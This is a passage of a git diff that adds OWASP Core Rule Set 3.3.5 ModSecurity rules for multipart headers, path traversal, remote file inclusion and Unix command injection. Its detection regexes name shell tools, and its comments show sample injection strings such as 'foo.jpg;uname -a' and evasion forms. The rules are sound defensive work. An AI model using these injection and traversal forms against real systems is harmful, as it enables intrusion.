tag:'platform-multi',\ + tag:'attack-multipart-header',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain" + SecRule ARGS:_charset_ "!@within |%{tx.allowed_request_content_type_charset}|" \ + "t:lowercase,\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# Only allow specific charsets same as Rule 920600 +# Note: this is in phase:2 because these are headers that come in the body +SecRule MULTIPART_PART_HEADERS "@rx ^content-type\s*+:\s*+(.*)$" \ + "id:922110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Illegal MIME Multipart Header content-type: charset parameter',\ + logdata:'Matched Data: %{TX.1} found within Content-Type multipart form',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/272/220',\ + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain" + SecRule TX:1 "!@rx ^(?:(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+)\/(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+))(?:\s*+;\s*+(?:(?:charset\s*+=\s*+(?:\"?(?:iso-8859-15?|windows-1252|utf-8)\b\"?))|(?:(?:c(?:h(?:a(?:r(?:s(?:e[^t\"(),\/:;<=>?![\x5c\]{}]|[^e\"(),/:;<=>?![\x5c\]{}])|[^s\"(),/:;<=>?![\x5c\]{}])|[^r\"(),/:;<=>?![\x5c\]{}])|[^a\"(),/:;<=>?![\x5c\]{}])|[^h\"(),/:;<=>?![\x5c\]{}])|[^c\"(),/:;<=>?![\x5c\]{}])[^\"(),/:;<=>?![\x5c\]{}]*(?:)\s*+=\s*+[^(),/:;<=>?![\x5c\]{}]+)|;?))*(?:\s*+,\s*+(?:(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+)\/(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+))(?:\s*+;\s*+(?:(?:charset\s*+=\s*+(?:\"?(?:iso-8859-15?|windows-1252|utf-8)\b\"?))|(?:(?:c(?:h(?:a(?:r(?:s(?:e[^t\"(),\/:;<=>?![\x5c\]{}]|[^e\"(),/:;<=>?![\x5c\]{}])|[^s\"(),/:;<=>?![\x5c\]{}])|[^r\"(),/:;<=>?![\x5c\]{}])|[^a\"(),/:;<=>?![\x5c\]{}])|[^h\"(),/:;<=>?![\x5c\]{}])|[^c\"(),/:;<=>?![\x5c\]{}])[^\"(),/:;<=>?![\x5c\]{}]*(?:)\s*+=\s*+[^(),/:;<=>?![\x5c\]{}]+)|;?))*)*$" \ + "t:lowercase,\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Content-Transfer-Encoding was deprecated by rfc7578 in 2015 and should not be used (see: https://www.rfc-editor.org/rfc/rfc7578#section-4.7) +# Note: this is in phase:2 because these are headers that come in the body +SecRule MULTIPART_PART_HEADERS "@rx content-transfer-encoding:(.*)" \ + "id:922120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Content-Transfer-Encoding was deprecated by rfc7578 in 2015 and should not be used',\ + logdata:'Matched Data: %{TX.0}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-deprecated-header',\ + tag:'OWASP_CRS',\ + tag:'capec/272/220',\ + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf new file mode 100644 index 000000000..986657ce9 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf @@ -0,0 +1,156 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# + +# +# -=[ Directory Traversal Attacks ]=- +# +# Ref: https://github.com/wireghoul/dotdotpwn +# +# [ Encoded /../ Payloads ] +# +SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@rx (?i)(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8|e)0%80%ae|2(?:(?:5(?:c0%25a|2))?e|%45)|u(?:(?:002|ff0)e|2024)|%32(?:%(?:%6|4)5|E)|c0(?:%[256aef]e|\.))|\.(?:%0[01]|\?)?|\?\.?|0x2e){2}(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))" \ + "id:930100,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Path Traversal Attack (/../)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-lfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/126',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'" + +# +# [ Decoded /../ Payloads ] +# +SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@rx (?:^|[\\/])\.\.(?:[\\/]|$)" \ + "id:930110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:cmdLine,\ + msg:'Path Traversal Attack (/../)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-lfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/126',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'" + +# +# -=[ OS File Access ]=- +# +# Ref: https://github.com/lightos/Panoptic/blob/master/cases.xml +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile lfi-os-files.data" \ + "id:930120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,\ + msg:'OS File Access Attempt',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-lfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/126',\ + tag:'PCI/6.5.4',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# -=[ Restricted File Access ]=- +# +# Detects attempts to retrieve application source code, metadata, +# credentials and version control history possibly reachable in a web root. +# +SecRule REQUEST_FILENAME "@pmFromFile restricted-files.data" \ + "id:930130,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,\ + msg:'Restricted File Access Attempt',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-lfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/126',\ + tag:'PCI/6.5.4',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +# +# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +# +# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:930018,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +# +# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-930-APPLICATION-ATTACK-LFI" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf new file mode 100644 index 000000000..888c8e4c3 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf @@ -0,0 +1,153 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ +# +# RFI Attacks +# + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# + +# -=[ Rule Logic ]=- +# These rules look for common types of Remote File Inclusion (RFI) attack methods. +# - URL Contains an IP Address +# - The PHP "include()" Function +# - RFI Data Ends with Question Mark(s) (?) +# - RFI Host Doesn't Match Local Host +# +# -=[ References ]=- +# http://projects.webappsec.org/Remote-File-Inclusion +# http://tacticalwebappsec.blogspot.com/2009/06/generic-remote-file-inclusion-attack.html +# +SecRule ARGS "@rx ^(?i:file|ftps?|https?):\/\/(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" \ + "id:931100,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/175/253',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_absolute_path|_CONF\[path\]|_SERVER\[DOCUMENT_ROOT\]|GALLERY_BASEDIR|path\[docroot\]|appserv_root|config\[root_dir\])=(?:file|ftps?|https?):\/\/" \ + "id:931110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'Possible Remote File Inclusion (RFI) Attack: Common RFI Vulnerable Parameter Name used w/URL Payload',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/175/253',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecRule ARGS "@rx ^(?i:file|ftps?|https?).*?\?+$" \ + "id:931120,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Possible Remote File Inclusion (RFI) Attack: URL Payload Used w/Trailing Question Mark Character (?)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/175/253',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +# +# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# + +SecRule ARGS "@rx ^(?i:file|ftps?|https?)://([^/]*).*$" \ + "id:931130,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rfi',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/175/253',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\ + chain" + SecRule TX:/rfi_parameter_.*/ "!@endsWith .%{request_headers.host}" \ + "ctl:auditLogParts=+E,\ + setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +# +# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:931018,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +# +# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-931-APPLICATION-ATTACK-RFI" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf new file mode 100644 index 000000000..b586045bc --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf @@ -0,0 +1,730 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# + + +# [ Unix command injection ] +# +# This rule detects Unix command injections. +# A command injection takes a form such as: +# +# foo.jpg;uname -a +# foo.jpg||uname -a +# +# The vulnerability exists when an application executes a shell command +# without proper input escaping/validation. +# +# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit: +# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ] +# +# To prevent false positives, we look for a 'starting sequence' that +# precedes a command in shell syntax, such as: ; | & $( ` <( >( +# Anatomy of the regexp with examples of patterns caught: +# +# 1. Starting tokens +# +# ; ;ifconfig +# \{ {ifconfig} +# \| |ifconfig +# \|\| ||ifconfig +# & &ifconfig +# && &&ifconfig +# \n ;\nifconfig +# \r ;\rifconfig +# \$\( $(ifconfig) +# $\(\( $((ifconfig)) +# ` `ifconfig` +# \${ ${ifconfig} +# <\( <( ifconfig ) +# >\( >( ifconfig ) +# \(\s*\) a() ( ifconfig; ); a +# +# 2. Command prefixes +# +# { { ifconfig } +# \s*\(\s* ( ifconfig ) +# \w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+ VARNAME=xyz ifconfig +# !\s* ! ifconfig +# \$ $ifconfig +# +# 3. Quoting +# +# ' 'ifconfig' +# \" "ifconfig" +# +# 4. Paths +# +# [\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/ /sbin/ifconfig, /s?in/./ifconfig, /s[a-b]in/ifconfig etc. +# +# This rule is case-sensitive to prevent FP ("Cat" vs. "cat"). +# +# An effort was made to combat evasions by shell quoting (e.g. 'ls', +# 'l'"s", \l\s are all valid). ModSecurity has a t:cmdLine +# transformation built-in to deal with this, but unfortunately, it +# replaces ';' characters and lowercases the payload, which is less +# useful for this case. However, emulating the transformation makes +# the regexp more complex. +# +# To rebuild the word list regexp: +# cd util/regexp-assemble +# cat regexp-932100.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# +# Then insert the assembled regexp into this template: +# +# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* +# [regexp assembled from util/regexp-assemble/regexp-932100.txt] +# \b" \ +# +# This is the base Rule to prevent Unix Command Injection +# Please refer other rules 932105,932106 to know more. +# +# .932100 +# ├── 932105 +# ├── 932106 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:l[\\\\'\"]*(?:w[\\\\'\"]*p[\\\\'\"]*-[\\\\'\"]*(?:d[\\\\'\"]*(?:o[\\\\'\"]*w[\\\\'\"]*n[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*a[\\\\'\"]*d|u[\\\\'\"]*m[\\\\'\"]*p)|r[\\\\'\"]*e[\\\\'\"]*q[\\\\'\"]*u[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|m[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*r)|s(?:[\\\\'\"]*(?:b[\\\\'\"]*_[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*s[\\\\'\"]*e|c[\\\\'\"]*p[\\\\'\"]*u|m[\\\\'\"]*o[\\\\'\"]*d|p[\\\\'\"]*c[\\\\'\"]*i|u[\\\\'\"]*s[\\\\'\"]*b|-[\\\\'\"]*F|h[\\\\'\"]*w|o[\\\\'\"]*f))?|z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|m[\\\\'\"]*(?:o[\\\\'\"]*r[\\\\'\"]*e|a)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s)|e[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*(?:(?:f[\\\\'\"]*i[\\\\'\"]*l|p[\\\\'\"]*i[\\\\'\"]*p)[\\\\'\"]*e|e[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*o|(?:\s|<|>).*)|a[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*(?:l[\\\\'\"]*o[\\\\'\"]*g(?:[\\\\'\"]*i[\\\\'\"]*n)?|c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*m|(?:\s|<|>).*)|o[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*(?:t[\\\\'\"]*e|l)[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e)|d[\\\\'\"]*(?:c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g|d[\\\\'\"]*(?:\s|<|>).*)|f[\\\\'\"]*t[\\\\'\"]*p(?:[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*t)?|(?:[np]|y[\\\\'\"]*n[\\\\'\"]*x)[\\\\'\"]*(?:\s|<|>).*)|b[\\\\'\"]*(?:z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*p[\\\\'\"]*2)|s[\\\\'\"]*d[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*f[\\\\'\"]*f|t[\\\\'\"]*a[\\\\'\"]*r)|a[\\\\'\"]*(?:t[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|s[\\\\'\"]*h)|r[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*k[\\\\'\"]*s[\\\\'\"]*w|u[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*n)|c[\\\\'\"]*(?:o[\\\\'\"]*(?:m[\\\\'\"]*(?:p[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*d)[\\\\'\"]*(?:\s|<|>).*|p[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*c)|h[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*(?:\s|<|>).*|f[\\\\'\"]*l[\\\\'\"]*a[\\\\'\"]*g[\\\\'\"]*s|a[\\\\'\"]*t[\\\\'\"]*t[\\\\'\"]*r|m[\\\\'\"]*o[\\\\'\"]*d)|r[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*b|(?:[cp]|a[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|u[\\\\'\"]*r[\\\\'\"]*l|s[\\\\'\"]*h)|f[\\\\'\"]*(?:i(?:[\\\\'\"]*(?:l[\\\\'\"]*e[\\\\'\"]*(?:t[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|(?:\s|<|>).*)|n[\\\\'\"]*d[\\\\'\"]*(?:\s|<|>).*))?|t[\\\\'\"]*p[\\\\'\"]*(?:s[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*s|w[\\\\'\"]*h[\\\\'\"]*o|(?:\s|<|>).*)|u[\\\\'\"]*n[\\\\'\"]*c[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*o[\\\\'\"]*n|(?:e[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*h|c)[\\\\'\"]*(?:\s|<|>).*|o[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*h|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p)|e[\\\\'\"]*(?:n[\\\\'\"]*(?:v(?:[\\\\'\"]*-[\\\\'\"]*u[\\\\'\"]*p[\\\\'\"]*d[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*e)?|d[\\\\'\"]*(?:i[\\\\'\"]*f|s[\\\\'\"]*w))|x[\\\\'\"]*(?:p[\\\\'\"]*(?:a[\\\\'\"]*n[\\\\'\"]*d|o[\\\\'\"]*r[\\\\'\"]*t|r)|e[\\\\'\"]*c[\\\\'\"]*(?:\s|<|>).*)|c[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|s[\\\\'\"]*a[\\\\'\"]*c|v[\\\\'\"]*a[\\\\'\"]*l)|h[\\\\'\"]*(?:t[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|p[\\\\'\"]*a[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*w[\\\\'\"]*d)|o[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*(?:n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e|i[\\\\'\"]*d)|(?:e[\\\\'\"]*a[\\\\'\"]*d|u[\\\\'\"]*p)[\\\\'\"]*(?:\s|<|>).